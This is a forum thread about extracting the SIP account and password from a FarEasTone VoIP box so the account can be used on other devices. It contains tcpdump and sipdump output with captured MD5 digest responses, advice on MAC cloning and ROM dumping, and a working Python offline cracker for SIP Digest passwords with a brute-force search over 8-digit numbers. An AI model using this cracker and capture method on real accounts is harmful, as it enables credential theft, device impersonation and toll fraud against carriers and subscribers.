I remember seeing an article earlier about cracking the WT2's SSH login account and password...
It seemed to be at the moment the box connects...
When the server side pushes in a firmware check or upgrade... capture the connection packets and analyze them,
and pick the login account and password out of them.
That way it can be cracked very quickly ^^"~!!
Offering this to those of you who are more familiar with packet capture and analysis,
hoping this clue and approach lets the push into the tiger's den make quick progress.. ^^"~!!
Good luck~!!
This post was edited by ycfu on 2010-04-16 08:36 AM. Reason: SSH already connected
Enterprise-grade FarEasTone 070 subscribers who bring their own equipment get the SIP login account and password directly. (But there is a NT$500 monthly fee, which can be credited against call charges.)
Netizen above, remember you also need to detect the registrar server and the proxy server.
But I don't have anywhere near that much usage; NT$500 a month feels like a heavy burden!
My sniffer capture method: first set the WT5's IP to DHCP, then capture on the NAT box (FreeBSD) with tcpdump and SIPcrack (its sipdump tool).
The extracted information looks roughly like this:
tcpdump
===================================
23:06:38.651080 IP freebsd.home.bootps > 192.168.1.16.bootpc: BOOTP/DHCP, Reply, length 300
23:06:38.652539 IP freebsd.home.bootps > 192.168.1.16.bootpc: BOOTP/DHCP, Reply, length 300
23:06:42.732331 ARP, Request who-has freebsd.home tell 192.168.1.16, length 46
23:06:42.732381 ARP, Reply freebsd.home is-at 00:50:8b:b2:79:45 (oui Unknown), length 28
23:06:42.733503 IP 192.168.1.16.sip > sj232-125.dialup.seed.net.tw.sip: SIP, length: 483
23:06:42.749865 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 363
23:06:42.751146 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 626
23:06:42.754150 IP 192.168.1.16.sip > sj232-125.dialup.seed.net.tw.sip: SIP, length: 782
23:06:42.771861 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 363
23:06:42.792883 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 489
23:06:42.810429 IP 192.168.1.16.sip > sj232-125.dialup.seed.net.tw.sip: SIP, length: 483
23:06:42.826614 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 363
23:06:42.828170 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 626
23:06:42.830880 IP 192.168.1.16.sip > sj232-125.dialup.seed.net.tw.sip: SIP, length: 782
23:06:42.850367 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 363
23:06:42.869426 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 553
23:06:47.608573 IP 192.168.1.16.1026 > dns.seed.net.tw.domain: 2+ A? wtntp.seed.net.tw. (35)
23:06:47.622352 IP dns.seed.net.tw.domain > 192.168.1.16.1026: 2* 1/0/0 A 139.175.252.22 (51)
23:06:47.623166 IP 192.168.1.16.1025 > nsm6.seed.net.tw.ntp: NTPv3, Client, length 48
23:06:47.636572 IP nsm6.seed.net.tw.ntp > 192.168.1.16.1025: NTPv3, Server, length 48
23:06:50.985904 IP 192.168.1.16.1026 > dns.seed.net.tw.domain: 2+ A? (none). (24)
23:06:50.999884 IP dns.seed.net.tw.domain > 192.168.1.16.1026: 2 NXDomain* 0/1/0 (99)
23:06:51.000711 ARP, Request who-has file.home tell 192.168.1.16, length 46
23:06:51.016761 IP 192.168.1.16.1026 > hntp1.hinet.net.domain: 4+ A? (none). (24)
23:06:51.030366 IP hntp1.hinet.net.domain > 192.168.1.16.1026: 4 NXDomain 0/1/0 (99)
23:06:51.031076 IP 192.168.1.16.1026 > dns.seed.net.tw.domain: 5+ A? (none). (24)
23:06:51.044611 IP dns.seed.net.tw.domain > 192.168.1.16.1026: 5 NXDomain* 0/1/0 (99)
23:06:51.061649 IP 192.168.1.16.1026 > hntp1.hinet.net.domain: 7+ A? (none). (24)
23:06:51.075114 IP hntp1.hinet.net.domain > 192.168.1.16.1026: 7 NXDomain 0/1/0 (99)
23:06:51.075804 IP 192.168.1.16.1026 > dns.seed.net.tw.domain: 8+ A? (none). (24)
23:06:51.089347 IP dns.seed.net.tw.domain > 192.168.1.16.1026: 8 NXDomain* 0/1/0 (99)
23:06:51.104721 IP 192.168.1.16.1026 > hntp1.hinet.net.domain: 10+ A? (none). (24)
23:06:51.118127 IP hntp1.hinet.net.domain > 192.168.1.16.1026: 10 NXDomain 0/1/0 (99)
23:06:51.145541 IP 192.168.1.16.sip > sj232-125.dialup.seed.net.tw.sip: SIP, length: 479
23:06:51.161954 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 362
23:06:51.163486 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 626
23:06:51.169747 IP 192.168.1.16.sip > sj232-125.dialup.seed.net.tw.sip: SIP, length: 778
23:06:51.187476 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 362
.....
===================================
I won't list the rest~ it roughly keeps trying ports 1024~1026!
sipdump
===================================
192.168.1.16"139.175.232.125"18777070100xxxxx"Realm"REGISTER"sip5.wt.voip11.net.tw"MTI3MTM0MzkzNzY2OWE4NjAzYThkNDk0MDlmNWJiMjI3Yjg2Y2UxMjMxYzJj"yRs8YG.gD1NmuvvUSyMuVlN69Ud6xgXh"00000001"auth"MD5"89ccb792f55d79036939a3fe80bba00d
192.168.1.16"139.175.232.125"18777070100xxxxx"Realm"REGISTER"sip5.wt.voip11.net.tw"MTI3MTM0MzkzNzY2OWE4NjAzYThkNDk0MDlmNWJiMjI3Yjg2Y2UxMjMxYzJj"CSM9JhWyj39wHzJ3X-J1sSac-V-Cw.ZS"00000001"auth"MD5"c201cdd03ef119e7ac4028bbd78260ea
192.168.1.16"139.175.232.125"18777070100xxxxx"Realm"REGISTER"sip5.wt.voip11.net.tw"MTI3MTM0NDAwNzY0NjYzMTZlNzc1OTdkYjAzMzNmNjI4ZTEyYzA0NmQ1NDFm"VFX5zYD4ueLaRxRubd3cOu.0gHS3aruk"00000001"auth"MD5"41cb8b146a57692ad9dc41f0265cdc43
192.168.1.16"139.175.232.125"18777070100xxxxx"Realm"REGISTER"sip5.wt.voip11.net.tw"MTI3MTM0NDAwNzY0NjYzMTZlNzc1OTdkYjAzMzNmNjI4ZTEyYzA0NmQ1NDFm"vQQxxzf5ofyhCfXM5ZW5OEiz3RrpvC5e"00000001"auth"MD5"eb561d1b1c394f627dacb22b5c4c96e9
192.168.1.16"139.175.232.125"18777070100xxxxx"Realm"REGISTER"sip5.wt.voip11.net.tw"MTI3MTM0NDAwNzY0NjYzMTZlNzc1OTdkYjAzMzNmNjI4ZTEyYzA0NmQ1NDFm"qpf4NlRxlL2DH3RkKFyNpQoQnJkRdYnh"00000001"auth"MD5"d2680256cb6268eec6c8388aff39ee47
192.168.1.16"139.175.232.125"18777070100xxxxx"Realm"REGISTER"sip5.wt.voip11.net.tw"MTI3MTM0NDAwNzY0NjYzMTZlNzc1OTdkYjAzMzNmNjI4ZTEyYzA0NmQ1NDFm"K.D4oFyF32M01jrjxMnGowv8Bt6gYdQJ"00000001"auth"MD5"834d2d1c195f268038a9e604f8cf54ed
===================================
As I read it, the registrar server should be 139.175.232.125.
Right now the SIP username is visible; the SIP password has been run through MD5, so either crack it, or log in over SSH, after which the plaintext password should be visible.
I also have a separate SIP box (a white-label ATA-171M), and it seems its MAC address can be changed. I figure if I change the MAC to match the WT5 and set up the account and password, it should be able to take its place.
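What "run through MD5" means for the sipdump lines above, as an added example (this is not the poster's code and not SIPcrack itself): each line is a SIP Digest challenge/response pair, and the response is MD5 over the username, realm, password, method, URI, nonce, cnonce, nonce count and qop exactly as RFC 2617 specifies, so an offline guess only needs those captured fields. The code assumes the 12-field, double-quote-separated layout seen in the post, qop=auth and algorithm MD5; the sample line is constructed here with a made-up password and made-up nonces, not the thread's real capture.

```python
"""SIPcrack-style offline check of a sipdump line (added example, not SIPcrack)."""
import hashlib
from dataclasses import dataclass
from typing import Iterable, Iterator, Optional

# Field order of one sipdump line, separated by '"' (assumed from the post's output).
FIELDS = ("src", "dst", "user", "realm", "method", "uri",
          "nonce", "cnonce", "nc", "qop", "algorithm", "response")


@dataclass
class SipAuth:
    src: str
    dst: str
    user: str
    realm: str
    method: str
    uri: str
    nonce: str
    cnonce: str
    nc: str
    qop: str
    algorithm: str
    response: str


def parse_sipdump_line(line: str) -> SipAuth:
    """Split one sipdump record into its named fields; reject malformed lines."""
    parts = line.strip().split('"')
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return SipAuth(**dict(zip(FIELDS, parts)))


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(user: str, realm: str, password: str, method: str, uri: str,
                    nonce: str, cnonce: str = "", nc: str = "", qop: str = "") -> str:
    """RFC 2617 Digest response (algorithm MD5; MD5-sess is not handled here)."""
    ha1 = md5hex(f"{user}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    if qop:  # qop=auth form, as in the capture
        return md5hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return md5hex(f"{ha1}:{nonce}:{ha2}")  # legacy RFC 2069 form without qop


def crack(auth: SipAuth, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate password whose digest matches the captured response."""
    want = auth.response.lower()
    for pw in candidates:
        got = digest_response(auth.user, auth.realm, pw, auth.method, auth.uri,
                              auth.nonce, auth.cnonce, auth.nc, auth.qop)
        if got == want:
            return pw
    return None


def numeric_candidates(width: int, start: int = 0, stop: Optional[int] = None) -> Iterator[str]:
    """Zero-padded numeric strings, e.g. every 8-digit PIN; 10**8 is small for offline MD5."""
    if stop is None:
        stop = 10 ** width
    for n in range(start, stop):
        yield f"{n:0{width}d}"


def build_sipdump_line(user: str, realm: str, password: str, uri: str, nonce: str,
                       cnonce: str, method: str = "REGISTER", nc: str = "00000001",
                       qop: str = "auth", src: str = "192.168.1.16",
                       dst: str = "139.175.232.125") -> str:
    """Constructed capture for the demo: what a phone with this password would send."""
    resp = digest_response(user, realm, password, method, uri, nonce, cnonce, nc, qop)
    return '"'.join((src, dst, user, realm, method, uri, nonce, cnonce, nc, qop, "MD5", resp))


# Constructed sample; the username, realm shape and URI mimic the post, the password is made up.
SAMPLE_LINE = build_sipdump_line("18777070100xxxxx", "Realm", "12345678",
                                 "sip5.wt.voip11.net.tw", "bm9uY2UtZXhhbXBsZQ==", "Y25vbmNl")

if __name__ == "__main__":
    auth = parse_sipdump_line(SAMPLE_LINE)
    # Search a slice of the 8-digit numeric space around the planted value.
    print(crack(auth, numeric_candidates(8, 12345000, 12346000)))
```

The whole attack needs only what the capture already contains; the search space of an 8-digit numeric password is 10^8 candidates, each costing three MD5 calls, which is within reach of a plain CPU. Cracking the RFC 2617 worked example ("Mufasa" / "Circle Of Life") with the same function reproduces the response the RFC prints, which is the check that the digest order is right.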
The FarEasTone VoIP account is simply your 070 number, and the password is the 8-character xx.
A powerful and stable SIP gateway should be able to come online, as long as the server is configured correctly. It has nothing to do with the MAC.
My registration server starts with 218.
IPs starting with 139 are ones obtained through Seednet; probably old Seednet customers use them.
I once heard that a senior member dumped the ROM of a Chief Telecom box directly and obtained the account and password. The FarEasTone home call-saving box should be doable the same way, it's just that I don't know how.
Hoping a senior member can crack it; that would open up many more uses, and using it on a mobile phone would be especially convenient.
Here's a method the thread starter can try:
FarEasTone has a number-selection feature that lets you change your number once for free.
Although there aren't many numbers to choose from, probably fewer than 10,
after you change it, it writes the new number into the little white box,
which means there must be a login and a ROM-write action.
If you want to analyze packets, analyzing those messages
should more easily yield results.
I also hope it can work behind NAT, so that it can be used in hotels when abroad:
calls to Taiwan all count as local calls,
calls to Taiwan mobiles are a flat NT$3.3/min,
and Taiwan calling 070 is only NT$2/min (billed per second),
no different from being in Taiwan.